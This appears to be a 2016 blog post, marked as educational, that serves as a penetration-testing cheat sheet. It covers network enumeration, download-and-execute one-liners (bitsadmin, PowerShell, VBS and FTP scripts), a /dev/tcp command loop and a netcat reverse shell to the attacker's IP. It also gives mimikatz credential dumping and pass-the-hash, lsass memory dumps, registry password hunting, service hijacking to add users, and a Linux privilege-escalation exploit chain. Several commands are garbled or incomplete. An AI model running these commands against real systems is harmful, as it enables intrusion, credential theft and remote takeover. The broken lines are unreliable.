Thursday, 3 November 2016

General Exploitation Scenario

This article is for educational purposes only, I am no responsible for any damage applied wrongly by using this knowledge - it is as it is, a security research. The article does not mean to be full, but to create a scenario for security researchers, I have taken information from various resources as you will see and I have mentioned them - if I have missed something please excuse me. 

0. Enumaration

netdiscover -r <network>/24

nmap -sV -T4 -O -F --version-light <ip>
nmap -sC -sS -T4 -A -v -v -Pn <ip>
nmap -sC -sU -T4 -A -v -v -Pn –top-ports 200 <ip>
dirb http://<ip>
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://<ip>/FUZZ
smbclient -N -L <ip>
enum4linux -a <ip>
nikto -h <ip>

1. Download a file:

bitsadmin.exe /transfer "JobName" http://download.url/here.exe C:\destination\here.exe

bitsadmin /transfer wcb /priority high C:\downloads\examplefile.pdf
cmd.exe /c "bitsadmin /transfer myjob /download /priority high http://download.url c:\mess.exe&start mess.exe"

tftp -i host GET C:%homepath%file location_of_file_on_tftp_server

ftp username password get file exit

cmd.exe /c "@echo open>script.txt&@echo binary>>script.txt&@echo get /messbox.exe>>script.txt&@echo quit>>script.txt&@ftp -s:script.txt -v -A&@start messbox.exe"

Set args = Wscript.Arguments Url = "http://domain/file" dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", Url, False xHttp.Send with bStrm .type = 1 ' .open .write xHttp.responseBody .savetofile " C:%homepath%file", 2 ' end with

cmd.exe /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>poc.vbs &@echo "GET","download.url/messbo x.exe",false>>poc.vbs&@echo objXMLHTTP.send()>>poc.vbs&@echo If objXMLH TTP.Status=200 Then>>poc.vbs&@echo Set objADOStream=CreateObject("ADODB .Stream")>>poc.vbs&@echo objADOStream.Open>>poc.vbs&@echo objADOStream. Type=1 >>poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>poc. vbs&@echo objADOStream.Position=0 >>poc.vbs&@echo objADOStream.SaveToFi le "mess.exe">>poc.vbs&@echo objADOStream.Close>>poc.vbs&@echo Set objA DOStream=Nothing>>poc.vbs&@echo End if>>poc.vbs&@echo Set objXMLHTTP=No thing>>poc.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>poc.vb s&@echo objShell.Exec("mess.exe")>>poc.vbs&cscript.exe poc.vbs"

$p = New-Object System.Net.WebClient $p.DownloadFile("http://domain/file" "C:%homepath%file")
powershell set-executionpolicy unrestricted
cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('download.url/messbox.exe','mess.exe');Start-Process 'mess.exe'"
#!/usr/bin/php <?php         $data = @file("");         $lf = "local_file";         $fh = fopen($lf, 'w');         fwrite($fh, $data[0]);         fclose($fh); ?>

echo "<?php file_put_contents('28718.c', fopen('http://download.url/28718.c', 'r')); ?>" > down2.php

#!/usr/bin/perl use LWP::Simple; getstore("http://domain/file", "file");

#!/usr/bin/python import urllib2 u = urllib2.urlopen('http://domain/file') localFile = open('local_file', 'w') localFile.write( localFile.close()

#!/usr/bin/ruby require 'net/http' Net::HTTP.start("") { |http| r = http.get("/file") open("save_location", "wb") { |file| file.write(r.body) } }
exec 5<>/dev/tcp/
$ cat <&5 | while read line; do $line 2>&5 >&5; done


2. Get a limited shell:

h4x# ./ --url='http://localhost/test/cmd.php?=<rce>'
shell> id 
[*] Executed: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

By default, it assumes a GET request and uses the inline shell mode.

To specify a POST request, you pass the params and values just like a GET,
except you specify --method=post to tell the parser it is a POST injection.

For example:
h4x# ./ --url='http://localhost/test/cmd-post.php?cmd=<rce>' --method=post
shell> id
[*] Executed: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)




2.1 Direct Exploitation (Windows):

Microsoft Windows - 'RPC DCOM' Long Filename Overflow (MS03-026):

Microsoft Windows - 'RPC DCOM2' Remote Exploit (MS03-039):

Microsoft Windows - 'RPC2' Universal Exploit / Denial of Service (RPC3) (MS03-039):

Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049):

Microsoft Windows - ASN.1 Remote Exploit (MS04-007):

Microsoft IIS 5.0 - SSL Remote Buffer Overflow (MS04-011):

Microsoft Windows 2000/XP - Lsasrv.dll Remote Universal Exploit (MS04-011):

Microsoft Windows - NetDDE Remote Buffer Overflow (MS04-031):

Microsoft Windows Message - Queuing Buffer Overflow Universal Exploit (MS05-017) (v.0.3)

Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (MS05-039):

Microsoft Windows - CanonicalizePathName() Remote Exploit (MS06-040):

Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (2):

Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070):

Microsoft Windows Server - Code Execution (MS08-067):

Microsoft Windows Server 2000/2003 - Code Execution (MS08-067):

Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050):

Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054)

Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow 10-020 (PoC)

2.2. Direct Exploitation (Linux):

Read (carefully) the Kioptrix series, there are very nice examples.

2.3. Directory traversals:

3.1 Attempt hashdump (Windows)

Mimikatz Commands:

logonpasswords: mimikatz # sekurlsa::logonpasswords)

Extracts passwords in memory

pth (pass the hash):

mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
A fake identity is created and the faske identitt’s NTLM hash is replaced with the real one.
“ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable)”
“AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash.”

ptt (pass the ticket):

mimikatz # kerberos::ptt
Enables Kerberos ticket (TGT or TGS) injection into the current session.
tickets:  mimikatz # sekurlsa::tickets /export
Identifies all session Kerberos tickets and lists/exports them.
sekurlsa pulls the Kerberos data from memory and can access all user session tickets on the computer.
ekeys:  mimikatz # sekurlsa::ekeys
Extract the Kerberos ekeys from memory. Provides theft of a user account until the password is changed (which may be never for a Smartcard/PKI user).
dpapi:  mimikatz # sekurlsa::dpapi


mimikatz # sekurlsa::minidump lsass.dmp
Perform a minidump of the LSASS process and extract credential data from the lsass.dmp. A minidump can be saved off the computer for credential extraction later, but the major version of Windows must match (you can’t open the dump file from Windows 2012 on a Windows 2008 system).


mimikatz # sekurlsa::kerberos
 Extracts the smartcad/PIV PIN from memory (cached in LSASS when using a smartcard).


mimikatz # privilege::debug
Sets debug mode for current mimikatz session enabling LSASS access.
lsadump cache: (requires token::elevate to be SYSTEM)
mimikatz # lsadump::cache
Dumps cached Windows domain credentials from HKEY_LOCAL_MACHINE\SECURITY\Cache (accessible SYSTEM).

Download procdump

Create lsass.exe from lsass.dump from step#2

procdump -accepteula -ma lsass.exe lsass.dmp

Download mimikatz from

Run mimikatz

Use debug mode


Switch minidump

sekurlsa::minidump lsass.dmp

List all logon, now you will see the password


if you don't dump the memory, you must use this method

Run mimikatz
Inject sekurlsa.dll into lsass.exe:
inject::process lsass.exe sekurlsa.dll

List all password:

4.1 Escalate (Windows):

Try 1:
sysret -pid <explorer pid>

Try 2:

Process Injector:

Try 3:


Microsoft Windows NT/2000/XP/2003/Vista/2008/7/8 - Local Ring Exploit (EPATHOBJ):

Try 4:

NtGdiEnableEudc Exploit (MS11-011) - windows XP SP0-3
16262,platforms/windows/dos/16262.,"MS11-011(CVE-2011-0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability PoC",2011-03-01,"Nikita Tarakanov",windows,dos,0

Service Tracing Key (MS10-059)

Ryujin - ADF.sys priv esc - ms11-080
pyinstaller -
py2exe -

UAC Bypass priv esc

Try 5: 

Unattend credentials are stored in base64 and can be decoded manually with base64:
user@host $ base64 -d cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA=

dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b 
dir c:\ /s /b | findstr /si *vnc.ini
findstr /si password *.txt | *.xml | *.ini
findstr /si pass *.txt | *.xml | *.ini

Password recovery programs - small - RDP, Mail, IE, VNC, Dialup, Protected Storage...
Dumping cleartext credentials with mimikatz

VNC Stored:
reg query "HKCU\Software\ORL\WinVNC3\Password"

Windows Autologin: 
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

SNMP Parameters:
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

Putty clear text proxy credentials:
reg query" HKCU\Software\SimonTatham\PuTTY\Sessions"
Search the registry - copy (pipe)  to the clipboard (optional)
reg query HKLM /f password /t REG_SZ /s [ |clip]

reg query HKCU /f password /t REG_SZ /s [ |clip]

Change the upnp service binary

sc qc upnphost
sc config upnphost binpath= "net user <username> /add"
sc config upnphost obj= ".\LocalSystem" password =""
net stop upnphost
net start upnphost

Sysinternals tools
Check processes and start-up applications with Autoruns and procmon -

Services pointing to writeable locations
*- orphaned installs - applications not installed that still exist in startup
*- replacing unknown dlls
*- PATH directories with weak permissions - overwrites possible?

sysinternals tools
accesschk.exe -uwcqv *

*- unsecured processes
*- steal process/thread tokens (a'la incognito)
*- hijack handles for write access



4.2 Escalate Linux:

find / -user root -perm -4000 -ls 2>/dev/null

Read this carefully:

Exploit for distcc to escalate the privilege from user daemon to root.
wget --no-check-certificate -O exploit-8572.c
ls -l exploit-8572.c
gcc exploit-8572.c -o exploit-8572
ls -l exploit-8572*
echo '#!/bin/sh' > /tmp/run echo '/bin/netcat -e /bin/sh <our ip> 4444' >> /tmp/run ps -eaf | grep udev | grep -v grep [1] Record your PID (2709), [2] subtract 1 (2708), and [3] supply new PID to the next step. Subtract 1 from the process ID (PID) number

./exploit-8572 2708

Other exploits: